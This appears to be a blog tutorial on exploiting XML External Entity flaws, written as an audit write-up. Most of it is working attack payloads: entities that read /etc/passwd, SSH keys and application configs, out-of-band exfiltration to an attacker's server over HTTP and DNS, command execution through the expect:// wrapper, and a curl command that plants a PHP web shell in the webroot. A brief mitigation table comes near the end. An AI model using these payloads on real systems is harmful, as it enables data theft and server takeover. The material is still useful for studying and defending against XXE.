Comprehensive Guide to XML External Entity (XXE) Exploitation: Advanced Data Exfiltration, Blind Methods, and Achieving Remote Code Execution

Comprehensive Guide to XML External Entity (XXE) Exploitation: Advanced Data Exfiltration, Blind Methods, and Achieving Remote Code Execution

23 September 2025

Comprehensive Guide to XML External Entity (XXE) Exploitation: Advanced Data Exfiltration, Blind Methods, and Achieving Remote Code Execution

1. Introduction to XXE Vulnerabilities and Their Implications

While conducting a thorough security evaluation of a web application, I identified a severe XML External Entity (XXE) vulnerability. This issue allowed for the unauthorized retrieval of sensitive information, including system-level files, API keys, database connection strings, and user authentication details. By employing blind XXE exploitation strategies alongside out-of-band (OOB) data exfiltration techniques, I was able to elevate the attack to remote code execution (RCE), taking advantage of insecure configurations in the XML parser.

This in-depth guide explores:

  • Techniques for identifying and confirming XML processing endpoints
  • Methods for disclosing local files with practical examples
  • Approaches to bypass input validation and character restrictions using advanced encoding
  • Detailed blind XXE exploitation via HTTP and DNS protocols
  • Steps to escalate to RCE through PHP wrappers and persistent shell deployment

XXE vulnerabilities arise when XML parsers process external entities without proper restrictions. Entities in XML can reference external resources, such as files on the local filesystem or remote servers. If the parser is configured to resolve these entities (often the default in libraries like PHP’s SimpleXML or Java’s DocumentBuilder), attackers can inject malicious entities to read files, perform server-side request forgery (SSRF), or even execute code. This is particularly dangerous in applications handling user-submitted XML, such as APIs, file uploads, or configuration imports.

Common root causes include:

  • Enabling DTD (Document Type Definition) processing.
  • Lack of entity resolution disabling.
  • Insufficient input sanitization.

The impact can range from information disclosure (CWE-200) to full system compromise, depending on the environment.


2. Step-by-Step Exploitation Process

Step 1: Identifying Vulnerable XML Endpoints

Begin by mapping the application’s attack surface to find endpoints that accept and parse XML. Use tools like Burp Suite, ZAP, or Postman to intercept and analyze HTTP requests. Look for:

  • Content-Type headers set to application/xml or text/xml.
  • Endpoints handling SOAP, REST with XML payloads, or file uploads (e.g., SVG, DOCX which contain XML).
  • Form submissions or API calls with XML-structured bodies.

In this case, a POST request to /api/endpoint was captured:

POST /api/endpoint HTTP/1.1
Host: target.site
Content-Type: application/xml
Content-Length: 180

<?xml version="1.0" encoding="UTF-8"?>
<submission>
  <source>user@external.com</source>
  <target>admin@internal.com</target>
  <body>Standard submission content.</body>
</submission>

To automate discovery, use fuzzing tools like wfuzz or ffuf with XML payloads. Additionally, review source code if available (e.g., via leaked repositories) or check for known vulnerable libraries in the application’s stack.

Step 2: Testing for Basic XXE Vulnerability

Inject a test payload to see if external entities are resolved. Target readable system files like /etc/passwd on Linux or C:\Windows\win.ini on Windows for proof-of-concept:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE submission [
  <!ENTITY test SYSTEM "file:///etc/passwd">
]>
<submission>
  <source>&test;</source>
  <target>admin@internal.com</target>
</submission>

If the response includes:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...

This confirms the vulnerability. The parser is expanding the entity and including the file content in the response. Note variations:

  • On Windows: Use file:///C:/Windows/win.ini for testing.
  • Error messages might reveal partial content if direct echo is suppressed.

If no response is echoed, proceed to blind techniques (Section 4).


3. Advanced Techniques for File Disclosure and Evasion

Step 3: Bypassing Restrictions with Encoding and Filters

Many applications sanitize inputs to block special characters. Counter this with PHP stream wrappers like php://filter, which can encode outputs to avoid breaking XML or triggering filters:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE submission [
  <!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<submission>
  <source>&test;</source>
</submission>

Response example (truncated):

cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaA==
ZGFtb246eDoxOjE6ZGFtb246L3Vzci9zYmluOi91c3Ivc2Jpbjpub2xvZ2luCg==
YmluOng6MjoyOmJpbjovYmluOi91c3Ivc2Jpbjpub2xvZ2luCg==

Decode using:

echo -n "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaA==" | base64 -d

Other filters include:

  • convert.iconv.UTF8.CSISO2022KR for character set conversions.
  • zlib.deflate for compression, followed by decompression on your end.

This is crucial for binary files (e.g., images, executables) or when files contain XML-invalid characters.

Step 4: Extracting Sensitive Application Files

Escalate by targeting high-value files. Examples:

  • Database configs: /var/www/html/config/database.php
  • SSH keys: /root/.ssh/id_rsa
  • Environment vars: /proc/self/environ

Payload for a config file:

<!DOCTYPE submission [
  <!ENTITY config SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">
]>
<submission>
  <source>&config;</source>
</submission>

Decoded response might show:

<?php
$host = 'localhost';
$dbname = 'sensitive_db';
$user = 'db_user';
$pass = 'VerySecretPassword456!';
$api_key = 'sk_live_XXXXXXXXXXXXXXXXXXXX';
?>

Use these for further attacks, like SQL injection or API abuse. Chain with directory traversal if paths are unknown (e.g., file:///../../../../etc/passwd).


4. Blind XXE Exploitation and Out-of-Band (OOB) Exfiltration

Blind XXE occurs when entity expansion happens but results aren’t reflected. Use OOB to confirm and exfiltrate.

Step 5: HTTP OOB for Vulnerability Confirmation and Data Leakage

Force the server to request a resource from your controlled server:

<!DOCTYPE submission [
  <!ENTITY oob SYSTEM "http://your.burpcollaborator.net/xxe_test">
]>
<submission>
  <source>&oob;</source>
</submission>

Monitor with Burp Collaborator or a custom server:

nc -lvnp 80

For data exfil, embed content in the URL:

<!DOCTYPE submission [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY oob SYSTEM "http://yourserver.net/?data=%file;">
]>
<submission>
  <source>&oob;</source>
</submission>

Note: Use parameter entities (%) for DTD tricks in strict parsers.

Step 6: DNS OOB for Restricted Environments

DNS is harder to block. Exfiltrate via subdomains:

<!DOCTYPE submission [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY oob SYSTEM 'http://%file;.yourdomain.com/'>">
  %eval;
]>
<submission>
  <source>&oob;</source>
</submission>

Capture with tcpdump port 53 or a DNS server log. For large files, split into chunks using CDATA or substring methods (requires custom DTD hosting for advanced cases).


5. Achieving Remote Code Execution (RCE)

Step 7: Using expect:// Wrapper for Command Execution

If PHP’s expect extension is installed (check via phpinfo() if accessible), execute commands:

<!DOCTYPE submission [
  <!ENTITY rce SYSTEM "expect://ls -la /">
]>
<submission>
  <source>&rce;</source>
</submission>

Response could list root directory. Escalate with id, uname -a, or cat /etc/shadow.

Step 8: Deploying a Persistent Web Shell

Host a shell:

<?php system($_GET['cmd']); ?>

Saved as shell.php, served via python3 -m http.server.

Inject:

<!DOCTYPE submission [
  <!ENTITY deploy SYSTEM "expect://curl http://yourserver/shell.php -o /var/www/html/shell.php">
]>
<submission>
  <source>&deploy;</source>
</submission>

Execute via http://target.site/shell.php?cmd=uname -a. Use wget or fetch alternatives. For non-writable dirs, use /tmp and symlink if possible.


6. Mitigation Strategies in Detail

Vulnerability Type Recommended Mitigations
Basic and Blind XXE Disable external entity resolution (e.g., in PHP: libxml_disable_entity_loader(true);). Use secure parsers like JSON instead of XML.
File Disclosure Validate inputs with whitelists; sandbox the application; restrict file system permissions.
RCE via Wrappers Disable dangerous PHP extensions (expect, file wrappers); use least privilege for web server user.
OOB Exfiltration Firewall outbound traffic; monitor DNS/HTTP logs; use WAF rules for anomalous requests.

Additional best practices: Regular patching, code reviews, and penetration testing.


7. Conclusion and Key Takeaways

This audit demonstrated how a simple XXE flaw can lead to catastrophic breaches. By methodically escalating from file disclosure to RCE, it emphasizes the need for robust XML handling practices and proactive security measures. Always test in controlled environments and report responsibly.